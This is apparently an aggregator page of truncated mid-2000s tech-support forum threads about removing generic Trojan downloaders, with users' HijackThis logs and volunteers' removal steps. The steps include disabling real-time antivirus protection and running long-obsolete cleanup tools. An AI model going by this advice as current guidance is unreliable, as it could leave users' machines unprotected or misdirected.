2006-07-30 21:35:32 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\AVG7"
2006-07-30 21:34:50 ( .D... ) "C:\Program Files\Grisoft"
2006-06-15 18:56:54 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\MSN Search Toolbar"
2006-06-15 18:54:20 ( .D... ) "C:\Program Files\MSN Toolbar Suite"
2006-06-04 13:10:38 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\Sonic"
2006-06-04 13:09:40 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\Leadertech"
2006-06-04 11:15:04 ( .D... ) "C:\Program Files\PopCap Games"
2006-06-04 11:00:50 ( .D... ) "C:\Program Files\Zuma Deluxe"
2006-06-04 10:22:40 ( .D... ) "C:\Progra... Read more

A:Trojan Horse Downloader Generic ZIV

7 more replies
Answer Match 69.72%

I have been having terrible issues with my computer. I am computer stupid so be gentle with me. I run AVG free edition antivirus & I keep getting a box that says "Trojan horse Downloader.Generic.HGT. I try to fix it & it keeps coming back. What am I doing wrong? Also, I was running AOL Instant Messenger today. As soon as I logged on, it sent a message to everyone on my buddy list about wanting to put a picture of us on some website. If they clicked on it, then it gave them this virus as well. How come my virus protection did not stop this? I have included a copy of my HJT log. Any help you could provide would be greatly appreciated. Please remember, I don't know a whole lot about my computer. So whatever you may be able to explain, please do so in detail. Thanks so much, LisaM.



Logfile of HijackThis v1.99.1
Scan saved at 4:01:40 PM, on 6/21/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\relocater.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\Gris... Read more

A:Trojan horse Downloader.Generic.HGT

Hi LisaM and welcome to TSF.

You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.


If there is anything you don't understand, please ask BEFORE proceeding with the fixes.



HijackThis in Temp Folder
You are running HijackThis from a temporary directory. It needs to be in a permanent folder. Please go into Windows Explorer, click on C:\ then click on File > New > Folder and call it HJT , or another name of your choice and move the HJT files to this folder. The program creates backup files that we may need to use later. If the program is in a Temporary folder, files may be deleted by you or automatically if your system is set to empty temp files.



Disable Microsoft Defender
Please disable your Windows Defender Real-time Protection, as it may hinder the removal of some entries.Open Windows Defender.
Click on Tools, General Settings.
Scroll down and uncheck Turn on real-time protection (recommended).
After you uncheck this, click on the Save button and close Windows Defender.



Disable EwidoGuard
Please disable Ewido Security Suite's Guard, as it may hinder the removal of some entries. You can re-enable it after you're clean.Double-click the icon on Desktop to launch Ewido... Read more

1 more replies
Answer Match 69.72%

Hi all!

I have/had been infected with the Win 32 Generic Trojan Downloader V8 as discovered initially by AVG. I cleaned this but have been warned later for other infected files (several names) every time I reboot. Windows defender has identified these infected files, as well as AVG, and cleaned them. I am also seeing that web browsing is slow and several web pages are blocked in IE and Firefox (antivirus and security related pages). The good news is bleeping computer is not blocked.

I have since installed Spy Bot S&D, HJT and MAM, but they don't seem to detect anything. AVG finds infections on reboot occasionally. I'm also having trouble updating my anti virus, MAM and Windows Defender.

Please help. How do I restore full web navigation and kill the trojan downloader?
DDS (Ver_09-06-26.01) - NTFSx86
Run by GLADYS LOMBANA at 12:43:16.30 on Thu 07/16/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista? Home Premium 6.0.6001.1.1252.1.1033.18.3070.1394 [GMT -5:00]

SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k... Read more

A:Infected with Win 32 Generic Trojan Downloader V8

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.??If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine.??Please perform the following scan:Download DDS by sUBs from one of the following links.??Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool.??No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 69.72%

HiI'm fixing a friend's pc which has been infected with two trojan horses Downloader.Generic 7 and also 11.I have installed and run CCleaner, Malwarebytes Anti-Malware,, SuperAntiSpyware, updated Java Runtime (and deleted old version) and now I have the following log from HJT.Could someone please check this log to make sure I now have a clean system?ThanksCheersTeresaLogfile of Trend Micro HijackThis v2.0.2Scan saved at 1:45:37 PM, on 9/28/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16705)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Acer\Acer eConsole\MediaServerService.exeC:\Acer\Empowering Technology\ePerformance\MemCheck.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\RTHDCPL.EXEC:\Acer\Empowering Technology\eRecovery\eRAgent.exeC:\Program Files\CyberLink\PowerDVD\PDVDServ.exeC:\WINDOWS\sm56hlpr.exeC:\WINDOWS\system32\SysMonitor.exeC:\Acer\Empowering Technology\eDataSecurity\eDSloader.exeC:\Program Files\Acer\Acer eMode Management\AspireService.exeC:\Prog... Read more

A:Trojan Horse Downloader.generic 7 And 11

Hello Teresa.J,

Welcome to Bleeping Computer

Could I please see the report you got from MBAM? It would help me determine what we need to do from here.

Thanks,
tea

31 more replies
Answer Match 69.72%

My McAfee recently said that it found a trojan in my IE temp files that had infect Bgates[1].exe that keeps showing up as infected with the QLowZones-15. After that notice i get one that says a file in the Windows temp file has bee infected with a downloader trojan or something. I didnt note what the exact name was.



Logfile of HijackThis v1.99.1
Scan saved at 4:23:51 PM, on 7/13/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
c:\Program Files\Norton Personal Firewall\NISUM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Softex\OmniPass\Omniserv.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Softex\OmniPass\OPXPApp.exe
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\WLService.exe
c:\Program Files\Norton Personal Firewall\ccPxySvc.exe
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\WUSB54Gv2.exe
C:\WINDOWS\Explorer.EXE
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program F... Read more

A:QLowZones-15 Trojan and Generic DOwnloader

Hi Lithium and welcome to TSF.

There's not a great deal showing in your log, but let?s do some cleaning and see what turns up.


You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.



Show Hidden Files
Go to My Computer > Tools > Folder Options > View tab and make sure that Show hidden files and folders is enabled. Also make sure that the System files and Folders are showing / visible. Uncheck the Hide protected operating system files option.




Downloads
Please download Cleanup! or use this Alternate Link if the main link does not work and install it. You will use this later.
*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does NOT make backups. If you have any files in any TEMP directory and you need to keep them, then please MOVE THEM NOW!


Download Ewido Anti-Malware
This is a 30 day trialInstall Ewido Anti-Malware.
Double-click the icon on Desktop to launch Ewido
On the top of the main screen click Shield
Click the word active to change it to inactive
On the top of the main screen click Update.
Then click on Start Update. The update will start and a progress bar will show the updates being installed.
Once the update has completed select the &qu... Read more

4 more replies
Answer Match 69.72%

Trojan: Generic Downloader.c​
Hi

Now I went to get help at McAfee and I told them from the beginning My Problem, the Name of the Trojan and the File Name. So they may me do something that took me 2 days to do and When I told them it didn't work. The person ask me the name of the file, I told once again and The person send me here.

So I downloaded hijackthis. Like the person told me too. I scan it. I found it and i delete it. Then delete the back up one. But it's still on my computer. So I try delete it while it was restarting and still nothing. Please Help! I'm going crazy! It's gonna be a week my computer been like this.

The File Name: st3.dll
Trojan Name:Generic Downloader.c
 

A:Trojan: Generic Downloader.c Please Help! I'm going crazy!

16 more replies
Answer Match 69.72%

Im working on XP and yesterday I got a warning from my virus scan that it detected a trojan. Its a .dat files in my system32 folder, and it also says it also mentions a generic downloader.z in the virus scan window.

Ive been searching around on how to delete the file, but as usual it can't be because its already in use. Ive looked into the generic downloader.z thing but havent really gotten much understanding about it.

Anyways, ever since i got the alert, my computer is slowed right down. If I have trojan alert window open, then open another program or window (ex. taskmanager), the torjan seems to switch its application to whatever I just opened, then completely slowing it down to the point where it takes 5 minutes just to open the task manager. It just completely overloads my computer to run at full capacity, to the point where its to much.

If I start up my computer and immediately hit ctrl alt delete I can get it open without any problem, but from there I cant end any processes that I've read could be giving me issues. If I open any internet browsers, it shows up in the processes list, the trojan switches to the browser that I opened, but no window actually opens.

I have no idea what I can do. Pretty much everything is locked down and getting on the internet to download any virus removal programs isnt an option.

Any ideas of whats going on?

thanks for the help.

edit: the .dat file in my system 32 folder is named _c001FE60.dat if thats of any help.
 

More replies
Answer Match 69.72%

I was looking on one of your other forums and i had the same problem as one of your members, zinc63. I was reading threw the forum and was trying to work out the virus by myself and it turns out that i am not very good at that. Anyway i now have the hijackthis, smitrem.exe, ewido anit-malware, and killbox.exe. I ran the hijackthis and i hope that you can help me from here. The AVG pops up all the time with the virus and i press heal and it doesn't and no scans i have done in safe mode with any anitvirus has caught the problem and i don't have system restore on.Thanks for the help

brian

Logfile of HijackThis v1.99.1
Scan saved at 10:19:02 PM, on 5/2/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\SPYWAREfighter\spfprc.exe
C:\Program Files\AIM\aim.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Valve\Steam\Steam.exe
C:\WINDOWS\System32\dcomcfg.exe
C:\Program... Read more

A:Trojan Horse Downloader.Generic.NON

16 more replies
Answer Match 69.72%

please I need help! I'm trying to get rid of this virus that appears everytime I start my computer. AVG recognies it but seems not to be able to erase it from the disk.thank you very muchLogfile of HijackThis v1.99.1Scan saved at 13:52:25, on 02/05/2006Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\LEXBCES.EXEC:\WINDOWS\system32\LEXPPS.EXEC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exeC:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exeC:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exeC:\WINDOWS\System32\svchost.exeC:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exeC:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\Explorer.EXEC:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exeC:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exeC:\WINDOWS\system32\hkcmd.exeC:\Program Files\Dell\Me... Read more

A:Cant Get Rid Of Trojan Horse Downloader Generic.tuc

Hi and welcome to Bleeping Computer! My name is Sam and I will be helping you. Please download Ewido Security Suite it is a trial version of the program.Install ewido security suiteWhen installing, under "Additional Options" uncheck "Install background guard" and "Install scan via context menu".Launch ewido, there should be an icon on your desktop double-click it.The program will now go to the main screenYou will need to update ewido to the latest definition files.On the left hand side of the main screen click updateThen click on Start UpdateThe update will start and a progress bar will show the updates being installed.If you are having problems with the updater, you can use this link to manually update ewido.http://www.ewido.net/en/download/updates/Once the updates are installed do the following:Click on scannerClick on Complete System Scan and the scan will begin.While the scan is in progress you will be prompted to clean files, click OKWhen it asks if you want to clean the first file, put a check in the lower left corner of the box that says "Perform action on all infections" then choose clean and click OK.Once the scan has completed, there will be a button located on the bottom of the screen named Save reportClick Save report.Save the report .txt file to your desktop.Now close ewido security suite.Reboot your computer and post a new hijackthis log and the log from Ewido.

2 more replies
Answer Match 69.72%

I tried to follow the prep guide but could not get DDS to run so tried RSIT.exe which finally gave:- Hope I have uploaded the .txt file OKLogfile of random's system information tool 1.08 (written by random/random)Run by David at 2010-09-17 18:34:02Microsoft Windows XP Home Edition Service Pack 3System drive C: has 7 GB (9%) free of 73 GBTotal RAM: 510 MB (21% free)Logfile of Trend Micro HijackThis v2.0.4Scan saved at 18:36:38, on 17/09/10Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Alwil Software\Avast5\AvastSvc.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Analog Devices\Core\smax4pnp.exeC:\Program Files\Intel\Modem Event Monitor\IntelMEM.exeC:\WINDOWS\system32\hkcmd.exeC:\WINDOWS\system32\igfxpers.exeC:\Program Files\Common Files\Java\Java Update\jusched.exeC:\PROGRA~1\AVG\AVG8\avgtray.exeC:\Program Files\Common Files\Real\Update_OB\realsched.exeC:\Program Files\Common Files\InstallShield\UpdateService\issch.exeC:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exeC:\WINDOWS\system32\rundll32.exeC:\PROGRA~1\ALWILS~... Read more

A:Trojan Horse downloader generic 10.QLN

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The ap... Read more

3 more replies
Answer Match 69.72%

Hi, I need help getting rid of these virus please. Mcafee detected it. I am including a hijackthis log. Thank You

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:12:42 PM, on 2009-01-08
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\system32\DVDRAMSV.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\system32\lxcycoms.exe
C:\Program Files\McAfee\Common Framework\FrameworkService.exe
C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
c:\TOSHIBA\IVP\swupdate\swupdtmr.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\ehome\ehtray.e... Read more

A:Trojan virus generic.dx and downloader-uah

some one help please
 

1 more replies
Answer Match 69.72%

hello.PLS CAN SOMEONE REPLY QUICK

ive been told to come for assistance here by some expert from macafee. i do believe i have quiet a common trojan located in windows\system32/st3.dll which is infected by generic downloader. allthough it cannot be cleaned,or deleted.

as soon as i log on to my p.c within a minute i recieve a pop up from mcafee virus scan stating a trojan has been detected, all i want to do is get it removed, and findout that the problems ive been having with my p.c recently are linked to this trojan or not.

as instructed, i disabled systems resore, done a scan on safe mode with command prompt by typing
c:\SDAT>scan/adl/clan/report report txt/secure/program/streams/mime/mailbox/allole/rpterr/rptcor

after about an hour of scanning these were the results
Summary report on D:\*.*
File(s)
Total files: ........... 52442
Clean: ................. 52389
Possibly Infected: ..... 0
Cleaned: ............... 0
Non-critical Error(s): 1
Master Boot Record(s): ......... 1
Possibly Infected: ..... 0
Boot Sector(s): ................ 1
Possibly Infected: ..... 0

for some reason the trojan has not been picked up, and as soon as i reboot on normal screen, the pop up detecting trojan comes again.

please can you find a way to get rid of it.
p.s i have located the file st3.dll from my p.c would it be quicker,and safer to just delete this file from my p.c hence the trojan will be deleted???

MS WINDOWS XP
HOME EDITION
VERSION 2002
SERVICE: PACK2
COMPAQ PESARIO... Read more

A:ST3.DLL generic downloader trojan.HEEELLLLP

16 more replies
Answer Match 69.72%

Thanks to anyone who takes a look at this. My virus program keeps prompting me telling me that it can not remove this generic loader trojan it seems to be located in windows/system32dll, but I have no idea how to tell with these logs. Any help will be greatly appreciated. MY OS is windows XP Pro, and My AV is Macafee

Here is My hijack LOG:

Logfile of HijackThis v1.99.1
Scan saved at 2:14:43 PM, on 11/22/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16544)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\Dell\Media Experience\PCMService.exe
C:\Program Files\McAfee\MSK\MskAgent.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb12.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\WINDOWS... Read more

A:Please Help I have a generic downloader trojan problem

Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :
Restart your computer
After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
Instead of Windows loading as normal, the Advanced Options Menu should appear;
Select the first option, to run Windows in Safe Mode, then press Enter.
Choose your usual account.

Open the extracted SDFix folder and double click RunThis.bat to start the script.
Type Y to begin the cleanup process.
It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
Press any Key and it will restart the PC.
When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
(Report.txt will also be copied to Clipboard ready for posting back on the forum).
Finally paste the contents of the Report.txt back on the forum with a new HijackThis log

then when it has rebooted

Download Combofix to your desktop:

* Double-click combofix.exe & follow the prompts.
* When finished, it shall produce a log for you. Post that log in your... Read more

1 more replies
Answer Match 69.72%

I was prompted by my McAfee protection service that I have been infected with a Trojan type "Generic Downloader .z" It would not allow me to erase it or anything and now none of my spyware/virus scans are picking this up. Is this a problem? Here is my latest Hijackthis log report. Any help would be greatly appreciated.

Logfile of HijackThis v1.99.1
Scan saved at 7:31:53 PM, on 6/20/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
c:\program files\mcafee.com\agent\mcdetect.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfService.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfTray.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATI9AA.EXE
C:\PROGRA~1\mcafee.com\mps\mscif... Read more

A:Trojan generic Downloader removal HELP!

Hello and welcome to TSF

I recommend you Subscribe to this thread so you are notified of any replies via email. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

There isn't much showing in your log, so we'll try a general cleaning and see what turns up.

Please print out or copy this page to Notepad in order to assist you when carrying out the following instructions.

I see you have two or more Antivirus programs installed. In this case there can be too much of a good thing. Multiple AV's bog down your system and may even cause crashes. I highly recommend you remove all but one Antivirus program using Windows Add/Remove Programs.

Downloads(make sure to save these in a permanent location)
Cleanup!- Install it. You will use this later.

*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does not make backups.

Ewido Anti-MalwareInstall Ewido Anti-Malware
Double-click the icon on Desktop to launch Ewido
You will need to update Ewido to the latest definition files.On the top of the main screen click Shield
Click the word active to change it to inactive
On the top of the main screen click Update.
Then click on Start Update. The update will start and a progress bar will show the updates being installed.
I also recommend changing the "Update interval" to something more reasonable like 12 hours.
If you are having problems with the updater, you can use this li... Read more

4 more replies
Answer Match 69.72%

Hi
My sons computer is infected with the Trojan Downloader generic4. dem virus and infostealer. I need help I have downloaded AVG and it can not remove the virus. PLEASE HELP...

Here is the hijackthis log:

Logfile of HijackThis v1.99.1
Scan saved at 6:07:23 PM, on 4/18/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Spyware Terminator\SpywareTerminatorShield.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common F... Read more

A:Help...Trojan Downloader generic virus

13 more replies
Answer Match 69.72%

I have a similar problem with the above trojan as another poster on this forum. I followed the advice given to that poster and ran ATF Cleaner and Activescan. I still show three spyware programs. Here is my most recent logfile. Appreciate any help you can give me!!

Logfile of HijackThis v1.99.1
Scan saved at 7:58:36 PM, on 9/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Apex\ApexAgnt.exe
C:\Program Files\Network ICE\BlackICE\blackd.exe
C:\WINDOWS\system32\INTELMAA\ccmhlp32.exe
C:\Program Files\Wave Systems Corp\Common\DataServer.exe
C:\WINDOWS\system32\INTELMAA\ccmhelpr.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\Program Files\Intel\Intel NetStructure VPN Client\icsrv.exe
C:\PROGRA~1\Intel\INSTAN~1\issuser.exe
C:\Program Files\Network Associates\Common Framework\FrameworkService.exe
C:\Program Files\Network Associates\VirusScan\mcshield.exe
C:\Program Files\Network Associates\VirusScan\vstskmgr.exe
C:\Program Files\Intel\Intel Learning Network\Mobile Player\Bin\MBLPService.exe
